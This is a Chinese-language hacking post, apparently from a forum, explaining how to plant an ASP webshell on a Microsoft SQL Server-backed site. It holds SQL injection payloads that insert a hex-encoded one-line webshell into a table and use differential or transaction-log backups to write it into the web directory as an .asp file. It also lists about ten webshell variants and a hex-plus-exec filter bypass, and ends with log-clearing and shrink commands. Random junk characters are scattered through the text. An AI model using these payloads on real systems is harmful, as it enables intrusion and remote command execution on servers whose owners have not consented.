MSsql差异备份总结

admin

差异备份的流程大概这样：
) g3 s. H: }- h4 ?1.完整备份一次(保存位置当然可以改)
backup database 库名 to disk = 'c:\ddd.bak';--

! g" O* Y' g2 ]) w: f0 _3 Z( o2.创建表并插曲入数据
9 k/ ~. Y( {7 f# k9 B0 F9 Xcreate table [dbo].[dtest] ([cmd] [image]);
. W- Q  x- P5 p/ U+ U1 Yinsert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--
. s# p( v& j$ S# w% \! a
, V2 e2 U! s7 l/ Q3.进行差异备份
backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--

上面
0x3C25657865637574652872657175657374282261222929253E
( _+ ?! r/ M/ ?! d& q; |就是一句话木马的内容：<%execute(request("a"))%>
4 y% j7 l4 r' c% v" s6 D3 T. f
  e/ e+ `4 f. N& z: M% z$ {如下是网上常见的差异备份代码，思路一样！
===================================================
, J1 e' y4 [/ ]. |4 V: f! N0 s利用差异备份提高提高backupwebshell的成功率,减少文件大小
步骤:
1 ^+ `/ k" S* K! d/ t- F0 O5 ?$ V
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s  --备份数据库

create table [dbo].[xiaolu] ([cmd] [image]);  -- 创建一个表

! W  a  {6 l. A( `4 `5 W, q' ]
" P) v) U9 V7 e8 f* }0 Y' ?* N& iinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)  --将一句话木马的16进制字符插入到表中

% J  r) e7 n3 E" Z' s# I1 x  F: [declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT  --对数据库实行差异备份

9 U! B3 ?  x9 qdrop table [xiaolu]  -- 删除此表。
1 g/ a* ?/ I8 i+ s
0x77006F006B0061006F002E00620061006B00为wokao.bak
0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp
' R1 P2 Z) Y- e% F, y6 k* ?2 [: p$ E
声明：方法不是我想的，我只是写工具，默认得到shell是
<%execute(request("a"))%>
' q5 G" R; z: x- m) \===============================================================

我发现上面代码，有时会无效，而直接用
7 ?* k; t3 B: N+ ^0 C0 i; I
7 S$ B. Q4 A- m3 j9 O3 Fbackup database 库名 to disk = 'c:\ddd.bak'
* Z$ h" u5 V8 N  h& u
9 o" r% x. W! b7 s+ }create table [dbo].[dtest] ([cmd] [image]);

insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
. h2 i% O5 D! z9 h  d8 i' B
5 n* y; N( @" k3 b: Ubackup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
* T- |& w% e+ \7 i/ z6 ~: ]8 T
/ R& p) y* M2 ^7 S却可以成功，所以把最原始的方法写出来！思路是前人所创,这不说大家也知道的！
/ y- F* h5 c: t4 F  t- w
2 D6 ]2 @! T! N! a库名 必须要有效的库名，一般注入工具都可以得到！如果某站过滤 "‘",就要把字符内容转为数值了！
3 j, j; s8 G. D/ Z2 J
$ S8 C% z4 C% n- X0 }4 b网上还有log增量备份的，我也把他记录一下
2 V0 U" R3 U: F/ L; M=====================================================
另一种log增量备份技术:
0 _* d% H; G7 Y7 e5 M
';alter database null set RECOVERY FULL--

';create table cmd (a image)--
) k5 g+ ~+ K; k
';backup log null to disk = 'f:\cmd' with init--
. Y7 S/ Z9 V& r; U2 O: r1 {6 q
';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
& l7 D7 T* R6 [& e5 p" x) F- s
* m3 |( R9 u& \- l4 ?& m';backup log null to disk = '备份路径'--
' ]' D: v" H4 G7 b) @* E
';drop table cmd--
1 k/ v8 |) f# A+ S
: k. D5 p6 X: c6 A+ p% @';alter database XXX set RECOVERY SIMPLE--

5 D' Y$ `8 ^% D, ~" ~$ G' N1 e0 rPS:0x3C2565786563757465287265717565737428226122292
# X& y* \- G# W7 w' _& b3 g. J: ^( ]" D9253EDA 是一句话小马16进制转来的
# `' J* Z2 x8 Z
说到一句话马，还可以有这么几种写法：

) [" f# ^9 h: x* G/ U6 J. h. X" Wa)<%%25Execute(request("a"))%%25>
, d% X- O% T3 {  y! w7 `2 U  u: t6 B) Ob)<%Execute(request("a"))%>
% c- G& ~) u0 |c)%><%execute request("a")%><%
d)<script language=VBScript runat=server>execute request("a")</script>
- S8 A2 z0 @% ke)<%25Execute(request("a"))%25>
f)<%eval(request("a")):response.end%> 备分专用一句话   (也就是插入一句话后所有的代码都无效,在一句话这里打止)
g)"%><%eval (request (chr(309)))%><%'" 网站配置版权信息插马专用一句话
h)<%On Error Resume Next:response.clear:execute request("value"):response.End%>
0 t+ n* {0 i1 WI)<%eval request(0)%>
4 U" ?' Z  `6 p, E- b# V7 v0 NJ)"%><%Eval Request(0)%> 网站配置版权信息插马专用一句话
7 H3 {6 k: s5 o. G. a) y! y  a
0 t4 r8 |" j" T6 j1 }4 b; b* g=============================================

1 @/ x& ~" F4 I5 X1 _$ J8 O( H3 w( x当遇到差备过滤了/时用这个语句代替

: d# F' {0 K, Wdeclare @a varchar(1024);set @a=cast(0x65786563206D6D as varchar(1024));exec (@a);--

) ?5 [0 r. D7 T9 [: ?4 i9 y把要执行的语句转16进制然后用exec执行


减少备份文件大小方法如下:
  {- O( F8 A0 H3 ^) k
6 t( W! N* u/ k9 G4 S% B/ E总的来说就是那么简单几句,下面以备份数据库model为例子
# |6 c- u- W* m8 n4 a/ X) K1
# R6 b3 I. H* ~& ]: }id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
9 T9 [% Z6 a8 {2
id=1;backup database model to disk='你的路径‘ with differential,format;--



SQL语句清理日志
注：test为数据库名
5 M) c4 }! ?( \
- A1 }2 O/ V3 U0 [! [--清空日志
& I' \! N- t5 P9 z6 \DUMP TRANSACTION test WITH NO_LOG

+ a2 c6 L4 c7 @' A: @) D+ m--截断事务日志
* |8 r4 b' S8 a. b3 X. e& M9 _BACKUP LOG test WITH NO_LOG
2 v3 K( C7 T4 f4 ]2 |2 I" }
--收缩数据库
DBCC SHRINKDATABASE(test)

3 l; Q; s0 h: E, {# R4 G--收缩指定数据文件,1是文件号,可以通过这个语句查询到
Select * from sysfiles DBCC SHRINKFILE(1)
$ o* n# ]$ P( L% C
--以后能自动收缩
EXEC sp_dboption 'test', 'autoshrink', 'TRUE'